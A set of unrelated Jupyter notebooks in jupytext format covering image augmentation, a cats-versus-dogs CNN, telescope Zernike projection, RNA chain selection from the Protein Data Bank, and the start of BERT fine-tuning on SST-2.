src/QualitativeEvaluations.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Image Augmentation Like a Pro!
# !wget https://images-americanas.b2w.io/produtos/01/00/img/1474047/1/1474047100_1SZ.jpg
# !wget https://images-americanas.b2w.io/produtos/01/00/img/1474047/1/1474047100_3SZ.jpg
# !pip3 install tensorflow_addons --quiet
import tensorflow as tf
import tensorflow_addons as tfa
from matplotlib import pyplot as plt
# +
img1 = tf.io.decode_image(tf.io.gfile.GFile("1474047100_1SZ.jpg", "rb").read())
img2 = tf.io.decode_image(tf.io.gfile.GFile("1474047100_3SZ.jpg", "rb").read())
imgs = tf.stack([img1, img2])
for img in imgs:
plt.imshow(img)
plt.show()
# +
import math
IMAGE_SIZE = [256, 256]
def random_crop_image_squares(imgs, minstart=0, maxstart=0.25, minsize=0.75, maxsize=1.0, output_size=IMAGE_SIZE):
    a = tf.random.uniform(shape=(imgs.shape[0], 2), minval=minstart, maxval=maxstart)
    b = tf.random.uniform(shape=(imgs.shape[0], 2), minval=minsize, maxval=maxsize)
    boxes = tf.concat([a, tf.clip_by_value(a + b, 0.0, 1.0)], axis=1)
    return tf.image.crop_and_resize(imgs, boxes, tf.range(imgs.shape[0]), output_size)
def gaussian_noise_images(imgs, mean=0.0, stddev=1.0):
    noise = tf.random.normal(shape=tf.shape(imgs), mean=mean, stddev=stddev, dtype=tf.float32)
    return tf.clip_by_value(imgs + noise, 0, 255)
def _distort_image(imgs, rotate_degrees=360):
    _length = tf.shape(imgs)[0]
    _imgs = tf.image.resize(imgs, IMAGE_SIZE)
    _imgs = tf.image.random_flip_left_right(_imgs)
    _imgs = tf.image.random_hue(_imgs, 0.08)
    _imgs = tf.image.random_saturation(_imgs, 0.1, 1.6)
    _imgs = tf.image.random_brightness(_imgs, 0.1)
    _imgs = tf.image.random_contrast(_imgs, 0.7, 1.3)
    _imgs = gaussian_noise_images(_imgs, mean=0.0, stddev=10.0)
    _imgs = tfa.image.rotate(_imgs, tf.random.uniform(shape=[_length], minval=0.0, maxval=(math.pi / 180) * rotate_degrees))
    return random_crop_image_squares(_imgs, output_size=IMAGE_SIZE)
for img in _distort_image(imgs, 360):
    plt.imshow(tf.cast(img, tf.int32))
    plt.show()
# -
|
tensorflow/Image Data Augmentation.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# Python program to create
# Image Classifier using CNN
# Importing the required libraries
import os
import numpy as np
from random import shuffle
# -
TRAIN_DIR = 'E:/dataset/Cats_vs_Dogs/train'
TEST_DIR = 'E:/dataset/Cats_vs_Dogs/test1'
IMG_SIZE = 50
LR = 1e-3
'''Setting up the model name, which tensorflow uses to identify saved checkpoints'''
MODEL_NAME = 'dogsvscats-{}-{}.model'.format(LR, '6conv-basic')
# +
# Creating an empty list where we will store the training data
# after a little preprocessing of the data
training_data = []
# (elided in the original: each preprocessed image array is joined with its
# label and appended to the training_data list)
#
# shuffling of the training data to preserve the random state of our data
shuffle(training_data)
np.save('training_data.npy', training_data)
np.save('testing_data.npy',testing_data)
# +
import tflearn
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
import tensorflow as tf
tf.reset_default_graph()
convnet = input_data(shape =[None, IMG_SIZE, IMG_SIZE, 1], name ='input')
convnet = conv_2d(convnet, 32, 5, activation ='relu')
convnet = max_pool_2d(convnet, 5)
convnet = conv_2d(convnet, 64, 5, activation ='relu')
convnet = max_pool_2d(convnet, 5)
convnet = conv_2d(convnet, 128, 5, activation ='relu')
convnet = max_pool_2d(convnet, 5)
convnet = conv_2d(convnet, 64, 5, activation ='relu')
convnet = max_pool_2d(convnet, 5)
convnet = conv_2d(convnet, 32, 5, activation ='relu')
convnet = max_pool_2d(convnet, 5)
convnet = fully_connected(convnet, 1024, activation ='relu')
convnet = dropout(convnet, 0.8)
convnet = fully_connected(convnet, 2, activation ='softmax')
convnet = regression(convnet, optimizer ='adam', learning_rate = LR,
loss ='categorical_crossentropy', name ='targets')
model = tflearn.DNN(convnet, tensorboard_dir ='log')
# Splitting the testing data and training data
train = training_data[:-500]
test = training_data[-500:]
'''Setting up the features and labels'''
# X-Features & Y-Labels
X = np.array([i[0] for i in train]).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
Y = [i[1] for i in train]
test_x = np.array([i[0] for i in test]).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
test_y = [i[1] for i in test]
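The reshape above turns a list of H×W grayscale arrays into the `(N, H, W, 1)` tensor the convnet expects; a standalone check with fake data (`IMG_SIZE = 50` assumed from the constant above):

```python
import numpy as np

IMG_SIZE = 50  # assumed, matching the constant defined earlier
# Three fake [image, one-hot label] pairs, as create_train_data would produce
fake_train = [[np.zeros((IMG_SIZE, IMG_SIZE)), np.array([1, 0])] for _ in range(3)]
# Stack images and add the trailing single-channel axis
X = np.array([i[0] for i in fake_train]).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
Y = [i[1] for i in fake_train]
```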
'''Fitting the data into our model'''
# epoch = 5 taken
model.fit({'input': X}, {'targets': Y}, n_epoch = 5,
validation_set =({'input': test_x}, {'targets': test_y}),
snapshot_step = 500, show_metric = True, run_id = MODEL_NAME)
model.save(MODEL_NAME)
'''Testing the data'''
import matplotlib.pyplot as plt
# if you need to create the data:
# test_data = process_test_data()
# if you already have some saved:
test_data = np.load('test_data.npy')
fig = plt.figure()
for num, data in enumerate(test_data[:20]):
# cat: [1, 0]
# dog: [0, 1]
img_num = data[1]
img_data = data[0]
y = fig.add_subplot(4, 5, num + 1)
orig = img_data
data = img_data.reshape(IMG_SIZE, IMG_SIZE, 1)
model_out = model.predict([data])[0]
if np.argmax(model_out) == 1: str_label ='Dog'
else: str_label ='Cat'
y.imshow(orig, cmap ='gray')
plt.title(str_label)
y.axes.get_xaxis().set_visible(False)
y.axes.get_yaxis().set_visible(False)
plt.show()
# -
# <h1>Dealing with images</h1>
# +
'''Labelling the dataset'''
def label_img(img):
word_label = img.split('.')[-3]
# DIY One hot encoder
if word_label == 'cat': return [1, 0]
elif word_label == 'dog': return [0, 1]
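For filenames in the Kaggle `cat.0.jpg` / `dog.12.jpg` convention, the split-and-one-hot rule above works like this (standalone sketch mirroring `label_img`):

```python
def label_img_demo(filename):
    # 'cat.0.jpg'.split('.') -> ['cat', '0', 'jpg'], so [-3] is the class word
    word_label = filename.split('.')[-3]
    if word_label == 'cat':
        return [1, 0]   # one-hot: cat
    elif word_label == 'dog':
        return [0, 1]   # one-hot: dog
```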
"""Creating the training data"""
def create_train_data():
# Creating an empty list where we should the store the training data
# after a little preprocessing of the data
training_data = []
# tqdm is only used for interactive loading
# loading the training data
for img in tqdm(os.listdir(TRAIN_DIR)):
# labeling the images
label = label_img(img)
path = os.path.join(TRAIN_DIR, img)
        # loading the image from the path and then converting it into
        # grayscale for easier convnet processing
        img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
        # resizing the image for processing it in the convnet
        img = cv2.resize(img, (IMG_SIZE, IMG_SIZE))
# final step-forming the training data list with numpy array of the images
training_data.append([np.array(img), np.array(label)])
# shuffling of the training data to preserve the random state of our data
shuffle(training_data)
# saving our trained data for further uses if required
np.save('train_data.npy', training_data)
return training_data
'''Processing the given test data'''
# Almost the same as processing the training data, but
# we don't have to label it.
def process_test_data():
testing_data = []
for img in tqdm(os.listdir(TEST_DIR)):
path = os.path.join(TEST_DIR, img)
img_num = img.split('.')[0]
img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
img = cv2.resize(img, (IMG_SIZE, IMG_SIZE))
testing_data.append([np.array(img), img_num])
shuffle(testing_data)
np.save('test_data.npy', testing_data)
return testing_data
|
all_codes/keras model/keras model.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
import sys
import numpy as np
import math
import ceo
import matplotlib.pyplot as plt
import IPython
# %matplotlib inline
# Telescope parameters
D = 26.
nPx = 469
radial_order = 4
gmt = ceo.GMT_MX(D,nPx,M1_radial_order=radial_order,M2_radial_order=radial_order)
# +
# on-axis WFS parameters
nLenslet = 26 # number of sub-apertures across the pupil
n = 18 # number of pixels per subaperture
detectorRes = 2*n*nLenslet/2
BINNING = 2
# Initialize on-axis GS and WFS
ongs = ceo.Source("R",zenith=0.,azimuth=0., rays_box_size=D,rays_box_sampling=nPx,rays_origin=[0.0,0.0,25])
wfs = ceo.ShackHartmann(nLenslet, n, D/nLenslet,N_PX_IMAGE=2*n,BIN_IMAGE=BINNING,N_GS=1)
# Calibrate WFS slope null vector
ongs.reset()
gmt.reset() # Telescope perfectly phased
gmt.propagate(ongs)
wfs.calibrate(ongs,0.8)
plt.imshow(wfs.flux.host(shape=(nLenslet,nLenslet)),interpolation='none')
# -
print wfs.frame.shape
print "pupil sampling: %d pixel"%nPx
print "Pixel size: %.3farcsec"%(wfs.pixel_scale_arcsec)
sh_fov = wfs.pixel_scale_arcsec*wfs.N_PX_IMAGE/BINNING
print "Field of view: %.3farcsec"%(sh_fov)
# +
#Get residual WF solely due to telescope aberrations when perfectly aligned
ongs.reset()
gmt.reset()
gmt.propagate(ongs)
Wref = np.rollaxis( ongs.wavefront.phase.host(units='nm', shape=(1,ongs.N_SRC,ongs.n*ongs.m)),1,3)
#Put some Zernike modes on M1 segments and get the WF
zmode = np.array((2,4,6,8,10,11))
zstroke = 250e-9 #m rms SURF
ongs.reset()
gmt.reset()
for ii in range(zmode.size):
gmt.M1.zernike.a[ii,zmode[ii]] = zstroke
gmt.M1.zernike.update()
gmt.propagate(ongs)
W = np.rollaxis( ongs.wavefront.phase.host(units='nm', shape=(1,ongs.N_SRC,ongs.n*ongs.m)),1,3)
print W.shape
plt.imshow(ongs.phase.host(units='nm'),interpolation='None',cmap='RdYlBu')
plt.colorbar()
plt.title("nm WF")
# +
## Initialize the projection of segment phasemaps onto Zernikes
Zobj = ceo.ZernikeS(radial_order)
P = np.rollaxis( np.array( ongs.rays.piston_mask ),0,3)
# Find center coordinates (in pixels) of each segment mask
u = np.arange(ongs.n)
v = np.arange(ongs.m)
x,y = np.meshgrid(u,v)
x = x.reshape(1,-1,1)
y = y.reshape(1,-1,1)
xc = np.sum(x*P,axis=1)/P.sum(axis=1)
yc = np.sum(y*P,axis=1)/P.sum(axis=1)
# Preliminary estimation of radius (in pixels) of each segment mask (assuming that there is no central obscuration)
Rs = np.sqrt(P.sum(axis=1)/np.pi)
# Polar coordinates
rho = np.hypot( x - xc[:,np.newaxis,:], y - yc[:,np.newaxis,:]) #temporal rho vector
theta = np.arctan2( y - yc[:,np.newaxis,:], x - xc[:,np.newaxis,:]) * P
#Estimate central obscuration area of each segment mask
ObsArea = np.sum(rho < 0.9*Rs[:,np.newaxis,:] * ~P.astype('bool'), axis=1)
#Improve estimation of radius of each segment mask
Rs = np.sqrt( (P.sum(axis=1)+ObsArea) / np.pi)
#Normalize rho vector (unitary radius)
rho = rho / Rs[:,np.newaxis,:] #final rho vector
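The centroid and radius-from-area estimates above can be checked on a synthetic circular mask (standalone NumPy sketch; the 64×64 grid, center and radius are illustrative values, not the telescope geometry):

```python
import numpy as np

# Synthetic segment mask: a disk of radius 20 centered at (32, 30) on a 64x64 grid
n = 64
u = np.arange(n)
x, y = np.meshgrid(u, u)
P = ((x - 32) ** 2 + (y - 30) ** 2 < 20 ** 2).astype(float)

# Mask-weighted centroid, as in the xc/yc computation above
xc = (x * P).sum() / P.sum()
yc = (y * P).sum() / P.sum()
# Radius from area, assuming no central obscuration
Rs = np.sqrt(P.sum() / np.pi)
```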
# +
#Project a segment at a time:
segId = 1
alphaId = 0 #direction in the FoV (in case N_SRC > 0)
cutheta = ceo.cuDoubleArray(host_data=theta[segId-1,:,alphaId].reshape(ongs.m,ongs.n))
curho = ceo.cuDoubleArray(host_data= rho[segId-1,:,alphaId].reshape(ongs.m,ongs.n))
#myphase = ((W-Wref)[:,:,alphaId]*P[segId-1,:,alphaId]).reshape(ongs.n,ongs.m) #just the WF over one segment
myphase = (W-Wref)[:,:,alphaId].reshape(ongs.n,ongs.m)*P[0,:].reshape(nPx,nPx)
cuW = ceo.cuFloatArray(host_data=myphase)
plt.imshow(cuW.host())
plt.colorbar()
Zobj.projection(cuW, curho, cutheta)
print np.array_str(Zobj.a,precision=3,suppress_small=True)
# -
print np.mean(myphase[P[0,:].reshape(nPx,nPx)==1])
Zobj.update()
ZS = Zobj.surface(curho,cutheta)
plt.imshow(ZS.host()*P[0,:].reshape(nPx,nPx))
plt.colorbar()
Zobj.reset()
Z = np.zeros((nPx*nPx,Zobj.n_mode))
for k in range(Zobj.n_mode):
Zobj.a[0,k] = 1
Zobj.update()
S = Zobj.surface(curho,cutheta).host(shape=(nPx*nPx,1))*P[0,:].reshape(-1,1)
Z[:,k] = S.flatten()
Zobj.a[0,k] = 0
S.shape
plt.imshow(S.reshape(nPx,nPx))
plt.colorbar()
GZ = np.dot(Z.T,Z)/P[0,:].sum()
plt.imshow(GZ-np.eye(Zobj.n_mode),interpolation='None')
plt.colorbar()
|
notebooks/Segment-Zernike-Projection.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/philpham8/FindRepresentativeRNAChains/blob/main/FindRepresentativeRNAChains_Phillip.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="ekKURWsfbFUL"
# Developed by <NAME> on 05/2021
#
# Search for non-redundant RNAs in the Protein Data Bank using these criteria:
#
# * Variable length of nucleotides (min and max cutoffs)
# * No branched polymers (carbohydrates or oligosaccharides)
# * Resolution cutoff in Angstroms (as determined by the URL on rna.bgsu.edu)
#
# Also contains a function to look up ligands and generate an XLSX spreadsheet with information on chain length, title, and ligand nonpolymers (intentionally excluding ions).
# + id="9-yPDMUPS4MK"
import requests
import pandas as pd
explicit_ions = ['K', 'MG', 'NA', 'SR', 'BA', 'MN', 'CD', 'TL', 'SO4', 'IRI', 'ACT']
def json_from_url(url):
response = requests.get(url, timeout=5)
if response.status_code == requests.codes.ok: return response.json()
else: return
# Fetch PubMed data with requested PDB ID on PDB.
def get_pdb_pubmed(pdb_id):
request_url = "https://data.rcsb.org/rest/v1/core/pubmed"
return json_from_url(request_url + '/' + pdb_id)
# Fetch Nonpolymer data with requested Nonpolymer ID on PDB.
def get_pdb_nonpolymer(pdb_id, nonpolymer_id):
request_url = 'https://data.rcsb.org/rest/v1/core/nonpolymer_entity'
return json_from_url(request_url + '/' + pdb_id + '/' + nonpolymer_id)
# Fetch Chemical Composition data with requested Comp ID on PDB.
def get_pdb_chemcomp(comp_id):
request_url = 'https://data.rcsb.org/rest/v1/core/chemcomp'
return json_from_url(request_url + '/' + comp_id)
# Fetch information on requested PDB entry
def get_pdb_entry(pdb_id):
request_url = "https://data.rcsb.org/rest/v1/core/entry"
return json_from_url(request_url + '/' + pdb_id)
# Fetch information on requested PDB entity/chain (e.g. individual RNA)
def get_pdb_entity(pdb_id, chain_id):
request_url = "https://data.rcsb.org/rest/v1/core/polymer_entity"
return json_from_url(request_url + '/' + pdb_id + '/' + chain_id)
# Fetch abstract title from pubmed
def pdb_id_contains_excluded_words(pdb_id, excluded_words):
pubmed_json = get_pdb_pubmed(pdb_id)
if pubmed_json is not None and 'rcsb_pubmed_abstract_text' in pubmed_json:
abstract = pubmed_json['rcsb_pubmed_abstract_text'].lower()
return any(excluded_word.lower() in abstract for excluded_word in excluded_words)
else: return False
# Checks that the polymer is of type RNA and DOES NOT contain DNA, oligosaccharide, or protein.
def contains_rna_only(entry):
return entry['rcsb_entry_info']['polymer_composition'] == 'RNA' and entry['rcsb_entry_info']['na_polymer_entity_types'] == 'RNA (only)'
# Checks if it contains any nonpolymer (either ligands or ions)
# TODO: Ions should be permitted while ligands should not be. Temp action is excluding both.
def contains_nonpolymer(entry):
return entry['rcsb_entry_info']['nonpolymer_entity_count'] > 0
# Retrieve chemical name from CompID (e.g water)
def get_name_from_comp_id(comp_id):
return get_pdb_chemcomp(comp_id)['chem_comp']['name']
# Retrieve list of Comp ID from chain (e.g OHO)
def comp_id_from_pdb_and_nonpolymer_id(pdb_id, nonpolymer_id):
return get_pdb_nonpolymer(pdb_id, nonpolymer_id)['pdbx_entity_nonpoly']['comp_id']
# Retrieve chemical name from CompID (e.g water)
def comp_name_from_pdb_and_nonpolymer_id(pdb_id, nonpolymer_id):
return get_pdb_nonpolymer(pdb_id, nonpolymer_id)['pdbx_entity_nonpoly']['name']
# Retrieve list of chain ids from entry.
def get_list_of_chain_id(entry):
return entry['rcsb_entry_container_identifiers']['polymer_entity_ids']
# Retrieve list of chain ids from entry.
def get_entry_title(entry):
return entry['struct']['title']
# Retrieve list of nonpolymer ids from entry.
def get_list_of_nonpolymer_id(entry):
entry_identifiers = entry['rcsb_entry_container_identifiers']
if 'non_polymer_entity_ids' in entry_identifiers: return entry_identifiers['non_polymer_entity_ids']
else: return
# Exclude ions and return list of ligands
# (note: relies on the global pdb_id set by the calling loop below):
def nonpolymers_with_no_ions(list_of_nonpolymer_id):
list_of_nonpolymers = []
for nonpolymer_id in list_of_nonpolymer_id:
comp_id = comp_id_from_pdb_and_nonpolymer_id(pdb_id, nonpolymer_id)
if comp_id not in list_of_nonpolymers and comp_id not in explicit_ions:
list_of_nonpolymers.append(comp_id)
return list_of_nonpolymers
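The dedup-and-exclude step above can be exercised without any PDB lookups; here hypothetical comp IDs stand in for the network calls (illustration only):

```python
# Same ion list as the notebook's explicit_ions
explicit_ions = ['K', 'MG', 'NA', 'SR', 'BA', 'MN', 'CD', 'TL', 'SO4', 'IRI', 'ACT']

def filter_ions(comp_ids, ions=explicit_ions):
    # Keep each ligand once, dropping anything on the ion list
    ligands = []
    for comp_id in comp_ids:
        if comp_id not in ligands and comp_id not in ions:
            ligands.append(comp_id)
    return ligands

# Hypothetical comp IDs: MG and K are ions, SAM appears twice
result = filter_ions(['MG', 'SAM', 'K', 'SAM', 'GTP'])
```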
# Determine polymer length given entity.
def get_polymer_length(entity):
return entity['entity_poly']['rcsb_sample_sequence_length']
# + [markdown] id="EdYRcF4ULAe1"
# # Input direct URL (from BGSU), define nucleotide cutoffs, and specify exclusion words
# + colab={"base_uri": "https://localhost:8080/"} id="wBM2Sw4uEfZT" outputId="acfe600c-0916-4eca-d830-38e4d8b0c58a"
# Ask URL to CSV and then create dataframe from .csv
# E.g. http://rna.bgsu.edu/rna3dhub/nrlist/download/3.180/3.0A/csv
csv_url = input('Please provide direct URL to desired CSV file found on rna.bgsu.edu: ')
data = pd.read_csv(csv_url, usecols=[1])
# + colab={"base_uri": "https://localhost:8080/"} id="3GMhBEYCnqgt" outputId="8a2d0bc2-a11d-4ad9-fb05-ced2b95e7f4b"
# Ask user for maximum nucleotides
nt_max_cutoff = int(input("What should the maximum number (non-inclusive) of ribonucleotides be? "))
# Ask user for minimum nucleotides
nt_min_cutoff = int(input("What should the minimum number (non-inclusive) of ribonucleotides be? "))
# Ask user for if they would like to exclude any words from the PubMed abstract
excluded_words = input("List any words that you want to blacklist in the PubMed abstract. Separate words by space: ").split()
# + [markdown] id="UuW0TKebhfjc"
# # Extract PDB IDs from BGSU Spreadsheet
# + id="NneZmoDx66OU"
# Extract all PDB IDs of non-redundant RNAs from BGSU spreadsheet
bgsu_pdb_ids = []
for i, row in data.iterrows():
pdb_id = row[0].split('|')[0]
bgsu_pdb_ids.append(pdb_id)
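The split above assumes pipe-delimited BGSU entry IDs (e.g. `'4KQY|1|A'` — PDB ID, model, chain; the exact format is inferred from the code), keeping only the first field:

```python
def pdb_id_from_bgsu(entry_id):
    # '4KQY|1|A' -> '4KQY' (PDB ID is the first pipe-delimited field)
    return entry_id.split('|')[0]
```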
# + id="68Cd8d1J3jOL"
def pdb_info_from_entry(entry):
# Check if of type RNA (no carbohydrate or protein) and if it is not excluded.
# Immediately skip entry if it contains the word tRNA or other excluded words
if contains_rna_only(entry) and not pdb_id_contains_excluded_words(pdb_id, excluded_words):
# Get list of Chain IDs for given PDB entry
list_of_chain_id = get_list_of_chain_id(entry)
# Loop through each chain ID to get length
for chain_id in list_of_chain_id:
entity = get_pdb_entity(pdb_id, chain_id)
length = get_polymer_length(entity)
# Checks if chain meets min/max threshold
if nt_min_cutoff < length < nt_max_cutoff:
# Fetch list of all nonpolymer IDs
list_of_nonpolymer_id = get_list_of_nonpolymer_id(entry)
if list_of_nonpolymer_id is not None:
# Remove instances of ions. We want only the ligands
ligands = nonpolymers_with_no_ions(list_of_nonpolymer_id)
if not ligands: ligands = ['Apo'] # If no ligands found, we will call these 'Apo'
else:
ligands = ['None'] # If no ions or ligands, we will call these 'None'
# Make list of requested info (pdb_id, chain_id, length, and list_of_nonpolymers)
list_of_nonpolymers = [pdb_id, chain_id, get_entry_title(entry), length, ligands]
return list_of_nonpolymers
else:
return
# + [markdown] id="rLKYoYH05BZ3"
# # Filter all RNAs based on max/min nt cutoffs.
# Includes nonpolymers (ions/ligands). Excludes carbohydrates and proteins.
# + colab={"base_uri": "https://localhost:8080/", "height": 476} id="F2CrK3x25Ac3" outputId="2f35d739-d184-4f59-b856-c0af1d39578e"
# Whitelist any PDB IDs that do not meet the criteria or aren't found in the BGSU spreadsheet.
# E.g. 4KQY 4QK8 5V3I 4P8Z 1GID
whitelist_pdb_ids = input("Please list any additional PDB IDs that you want to include. Separate words by space: ").split()
matched_pdb_ids = bgsu_pdb_ids + whitelist_pdb_ids
benchmark_pdb_entries = []
# Loop through desired PDB IDs and if it meets criteria, add it.
for pdb_id in matched_pdb_ids:
entry = get_pdb_entry(pdb_id)
# Retrieve all info needed from PDB (including name, description length, ligand)
pdb_info = pdb_info_from_entry(entry)
if pdb_info is not None: benchmark_pdb_entries.append(pdb_info)
# Print number of RNAs found
print()
print('Found ', len(benchmark_pdb_entries), ' molecules:')
# Take list and create DataFrame
df = pd.DataFrame(benchmark_pdb_entries, columns = ["PDB ID", "Chain_ID", "Description", "Length (bp)", "Ligand (non-ion)"])
df
# + [markdown] id="wOjRQt4Oh41e"
# # Export dataframe to XLSX
# + id="CveWaL4Qh5I5" colab={"base_uri": "https://localhost:8080/", "height": 167} outputId="737610b3-17df-4966-e459-40d7c36a7ff3"
df.to_excel('Benchmark_RNAs' + '_' + str(nt_min_cutoff) + '_to_' + str(nt_max_cutoff) + '_nts' + '.xlsx', index=False)
# + [markdown] id="BwkkwcptK0Hv"
# **Helper function to determine list of ligands present in BGSU dataset:**
# + colab={"base_uri": "https://localhost:8080/"} id="DHKDksWUy91X" outputId="597025f1-20f1-4ea1-c1b2-a93ab1f3d98f"
list_of_nonpolymer_id = []
list_of_nonpolymers = {}
for pdb_id in matched_pdb_ids:
    entry = get_pdb_entry(pdb_id)
    list_of_nonpolymer_id = get_list_of_nonpolymer_id(entry)
    if list_of_nonpolymer_id is None:
        continue  # entry has no nonpolymers
    for nonpolymer_id in list_of_nonpolymer_id:
comp_id = comp_id_from_pdb_and_nonpolymer_id(pdb_id, nonpolymer_id)
comp_name = comp_name_from_pdb_and_nonpolymer_id(pdb_id, nonpolymer_id)
if comp_id not in list_of_nonpolymers:
list_of_nonpolymers[comp_id] = comp_name
# Print number of RNAs found
print()
print('Found ', len(list_of_nonpolymers), ' nonpolymers')
print(list_of_nonpolymers)
# + id="qtal4IDRuZm1"
# + [markdown] id="291a1H9bT2-_"
# **Manual Search to see if PDB ID matches criteria**
# + id="X2TE0ilsMqb9"
# Determine if a certain PDB ID passes all criteria.
pdb_id = input('Please type the PDB ID you want to search: ')
print()
entry = get_pdb_entry(pdb_id)
print('Contains RNA only: ', contains_rna_only(entry))
print('Contains excluded words (tRNA): ', pdb_id_contains_excluded_words(pdb_id, excluded_words))
list_of_chain_id = get_list_of_chain_id(entry)
for chain_id in list_of_chain_id:
entity = get_pdb_entity(pdb_id, chain_id)
print('Chain', chain_id, 'contains desired nt range:', nt_min_cutoff < get_polymer_length(entity) < nt_max_cutoff, "because it is", get_polymer_length(entity), "nt long")
print(entry)
|
FindRepresentativeRNAChains_Phillip.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.7.6 64-bit (''rapids'': conda)'
# language: python
# name: python37664bitrapidsconda05ea436670824d2ebed703c8c53b011e
# ---
# +
import dataclasses
from pathlib import Path
import nlp
import torch
import numpy as np
from transformers import BertTokenizerFast
from transformers import BertForSequenceClassification
from torch.optim.lr_scheduler import CosineAnnealingLR
from sklearn.model_selection import train_test_split
try:
from apex import amp
APEX_AVAILABLE = True
except ModuleNotFoundError:
APEX_AVAILABLE = False
from pytorch_helper_bot import (
BaseBot, MovingAverageStatsTrackerCallback, CheckpointCallback,
LearningRateSchedulerCallback, MultiStageScheduler, Top1Accuracy,
LinearLR
)
# -
CACHE_DIR = Path("../cache/")
CACHE_DIR.mkdir(exist_ok=True)
# Reference:
#
# * https://github.com/huggingface/nlp/blob/master/notebooks/Overview.ipynb
dataset = nlp.load_dataset('glue', "sst2")
set([x['label'] for x in dataset["train"]])
tokenizer = BertTokenizerFast.from_pretrained('bert-base-uncased')
# Tokenize our training dataset
def convert_to_features(example_batch):
# Tokenize contexts and questions (as pairs of inputs)
encodings = tokenizer.batch_encode_plus(example_batch['sentence'], pad_to_max_length=True, max_length=64)
return encodings
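What `pad_to_max_length` does can be sketched without transformers: pad token-id lists to a fixed length and build the matching attention mask (`PAD_ID = 0` and the example token ids are assumptions in the spirit of BERT's vocabulary):

```python
PAD_ID = 0  # assumed pad token id, as in BERT's vocabulary

def pad_batch(batch_ids, max_length=4):
    input_ids, attention_mask = [], []
    for ids in batch_ids:
        ids = ids[:max_length]                      # truncate long sequences
        pad = [PAD_ID] * (max_length - len(ids))
        input_ids.append(ids + pad)
        # 1 marks real tokens, 0 marks padding
        attention_mask.append([1] * len(ids) + [0] * len(pad))
    return input_ids, attention_mask

# Hypothetical token ids ([CLS] ... [SEP] style)
ids, mask = pad_batch([[101, 2009, 102], [101, 102]])
```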
# Format our dataset to outputs torch.Tensor to train a pytorch model
columns = ['input_ids', 'token_type_ids', 'attention_mask', "label"]
for subset in ("train", "validation"):
dataset[subset] = dataset[subset].map(convert_to_features, batched=True)
dataset[subset].set_format(type='torch', columns=columns)
tokenizer.decode(dataset['train'][6]["input_ids"].numpy())
dataset['train'][0]["attention_mask"]
class SST2Dataset(torch.utils.data.Dataset):
def __init__(self, entries_dict):
super().__init__()
self.entries_dict = entries_dict
def __len__(self):
return len(self.entries_dict["label"])
def __getitem__(self, idx):
return (
self.entries_dict["input_ids"][idx],
self.entries_dict["attention_mask"][idx],
self.entries_dict["token_type_ids"][idx],
self.entries_dict["label"][idx]
)
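The `__len__`/`__getitem__` contract the class implements can be sketched torch-free over the same dict-of-columns layout (hypothetical `TinyDataset`, illustration only — the real class returns tensors):

```python
class TinyDataset:
    def __init__(self, entries):
        # entries is a dict of parallel columns, like the *_dict objects below
        self.entries = entries

    def __len__(self):
        return len(self.entries["label"])

    def __getitem__(self, idx):
        # Return one row across all columns
        return (self.entries["input_ids"][idx], self.entries["label"][idx])

ds = TinyDataset({"input_ids": [[1, 2], [3, 4]], "label": [0, 1]})
```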
valid_idx, test_idx = train_test_split(list(range(len(dataset["validation"]))), test_size=0.5, random_state=42)
train_dict = {
"input_ids": dataset['train']["input_ids"],
"attention_mask": dataset['train']["attention_mask"],
"token_type_ids": dataset['train']["token_type_ids"],
"label": dataset['train']["label"]
}
valid_dict = {
"input_ids": dataset['validation']["input_ids"][valid_idx],
"attention_mask": dataset['validation']["attention_mask"][valid_idx],
"token_type_ids": dataset['validation']["token_type_ids"][valid_idx],
"label": dataset['validation']["label"][valid_idx]
}
test_dict = {
"input_ids": dataset['validation']["input_ids"][test_idx],
"attention_mask": dataset['validation']["attention_mask"][test_idx],
"token_type_ids": dataset['validation']["token_type_ids"][test_idx],
"label": dataset['validation']["label"][test_idx]
}
# Instantiate a PyTorch Dataloader around our dataset
train_loader = torch.utils.data.DataLoader(SST2Dataset(train_dict), batch_size=32, shuffle=True)
valid_loader = torch.utils.data.DataLoader(SST2Dataset(valid_dict), batch_size=32, drop_last=False)
test_loader = torch.utils.data.DataLoader(SST2Dataset(test_dict), batch_size=32, drop_last=False)
@dataclasses.dataclass
class SST2Bot(BaseBot):
log_dir = CACHE_DIR / "logs"
def __post_init__(self):
super().__post_init__()
self.loss_format = "%.6f"
@staticmethod
def extract_prediction(output):
return output[0]
model = BertForSequenceClassification.from_pretrained('bert-base-uncased').cuda()
# +
# torch.nn.init.kaiming_normal_(model.classifier.weight)
# torch.nn.init.constant_(model.classifier.bias, 0)
# torch.nn.init.kaiming_normal_(model.bert.pooler.dense.weight)
# torch.nn.init.constant_(model.bert.pooler.dense.bias, 0);
# -
optimizer = torch.optim.Adam(model.parameters(), lr=2e-5)
if APEX_AVAILABLE:
model, optimizer = amp.initialize(
model, optimizer, opt_level="O1"
)
# +
total_steps = len(train_loader) * 3
checkpoints = CheckpointCallback(
keep_n_checkpoints=1,
checkpoint_dir=CACHE_DIR / "model_cache/",
monitor_metric="accuracy"
)
lr_durations = [
int(total_steps*0.2),
